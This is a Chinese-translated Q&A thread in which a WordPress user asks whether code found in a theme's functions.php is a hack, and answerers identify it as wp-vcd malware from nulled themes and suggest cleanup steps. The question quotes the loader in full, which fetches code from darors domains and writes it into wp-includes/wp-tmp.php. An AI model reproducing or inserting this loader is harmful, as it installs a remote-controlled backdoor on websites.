这是Function.php中的黑客脚本吗?

时间:2019-04-03 作者:Alt C

我在neve主题WordPress中有如下代码。我对这个代码感到怀疑

$wp_auth_key=\'ac15616a33a4bae1388c29de0202c5e1\';
        if (($tmpcontent = @file_get_contents("http://www.darors.com/code.php") OR $tmpcontent = @file_get_contents_tcurl("http://www.darors.com/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {

            if (stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent));
                @file_put_contents(ABSPATH . \'wp-includes/wp-tmp.php\', $tmpcontent);

                if (!file_exists(ABSPATH . \'wp-includes/wp-tmp.php\')) {
                    @file_put_contents(get_template_directory() . \'/wp-tmp.php\', $tmpcontent);
                    if (!file_exists(get_template_directory() . \'/wp-tmp.php\')) {
                        @file_put_contents(\'wp-tmp.php\', $tmpcontent);
                    }
                }

            }
        }


        elseif ($tmpcontent = @file_get_contents("http://www.darors.pw/code.php")  AND stripos($tmpcontent, $wp_auth_key) !== false ) {

if (stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent));
                @file_put_contents(ABSPATH . \'wp-includes/wp-tmp.php\', $tmpcontent);

                if (!file_exists(ABSPATH . \'wp-includes/wp-tmp.php\')) {
                    @file_put_contents(get_template_directory() . \'/wp-tmp.php\', $tmpcontent);
                    if (!file_exists(get_template_directory() . \'/wp-tmp.php\')) {
                        @file_put_contents(\'wp-tmp.php\', $tmpcontent);
                    }
                }

            }
        } 

                elseif ($tmpcontent = @file_get_contents("http://www.darors.top/code.php")  AND stripos($tmpcontent, $wp_auth_key) !== false ) {

5 个回复
最合适的回答,由SO网友:Rick Hellewell 整理而成

我同意,很有可能会有一个带有该代码的黑客网站。@file\\u put\\u contents语句正在尝试写入您的wp admin文件夹。那可不好。

因此,我建议进行反黑客检查。如果你认为你的网站被黑客攻击了,那么你必须做一些(很多)事情来“反黑客”。包括:

更改所有密码(WP管理员、FTP、主机、数据库)重新安装WP(通过更新页面),然后手动重新安装所有主题(从存储库)和插件set of procedures that I use. 不过,这是可以做到的,只需要做一点工作。

SO网友:KFish

看起来像是wp vcd恶意软件。关于这一点,有很多信息,最常见的是空主题(即,你不想付费的高级主题,而是从一个粗略的网站下载了一份免费的)。如果你正在使用这样一个主题,我建议将其删除,并向实际开发人员支付主题的合法副本,该副本不包含恶意软件,或者选择另一个符合你预算的主题,而不包含恶意软件。

https://www.google.com/search?q=%22darors%22+wp-vcd

SO网友:Krzysiek Dróżdż

是的,很可能是的。

它从远程服务器获取一些代码,并将其保存到您的服务器上。所以是的,这肯定是有害的。

SO网友:Gaurav

这是一种可能性。

尽管如此,我认为这是一种只为具有有效许可证密钥的站点推送主题更新的机制。

或者,它是为任何泄露密钥删除主题的后门。

如果不看下载的内容,就很难确定地说什么。

SO网友:Iliyan

我可以确认这是一个向用户显示广告的恶意软件。

wp include文件夹中有3个文件:

\'wp-feed.php\',
\'wp-tmp.php\',
\'wp-vcd.php\',
还有主题功能。php和其他文件。使用phpstorm安全删除并搜索注释中的CG,以查看您有多少文件。这里有一个关于这个的博客https://www.getastra.com/blog/911/how-to-fix-wp-vcd-backdoor-hack-in-wordpress-functions-php/

原因可能是受感染的主题文件。根据易受攻击的插件列表检查您的插件https://wpvulndb.com/